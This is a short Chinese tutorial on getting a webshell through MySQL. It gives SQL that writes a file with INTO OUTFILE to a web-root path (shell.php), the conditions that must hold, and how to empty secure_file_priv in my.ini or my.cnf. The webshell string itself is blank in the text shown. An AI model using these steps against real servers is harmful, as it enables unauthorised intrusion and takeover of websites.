mysql数据库拿shell_利用数据库拿shell的一些姿势

0x01、利用MySQL命令导出getshell

利用条件：

1、拥有网站的写入权限

2、Secure_file_priv参数为空或者为指定路径

3、知道网站的绝对路径

方法：

通过into outfile 进行文件写入，写入一句话木马

CREATE TABLE shell(cmd text);

INSERT INTO shell(cmd) VALUES('');

SELECT cmd from shell INTO OUTFILE 'D:/php/www/shell.php';

*************************OR************************************

select '' into outfile 'D:/php/www/shell.php';

测试：

利用PHPStudy打开MySQL命令行

通过show global variables like ‘%secure%’；命令查看secure_file_priv，这个参数用来限制数据的导入和导出操作。

如上图所示，这个参数为NULL，MySQL服务会禁止导入和导出操作。

解决方法：

windows下：修改my.ini 在[mysqld]内加入secure_file_priv =

linux下：修改my.cnf 在[mysqld]内加入secure_file_priv =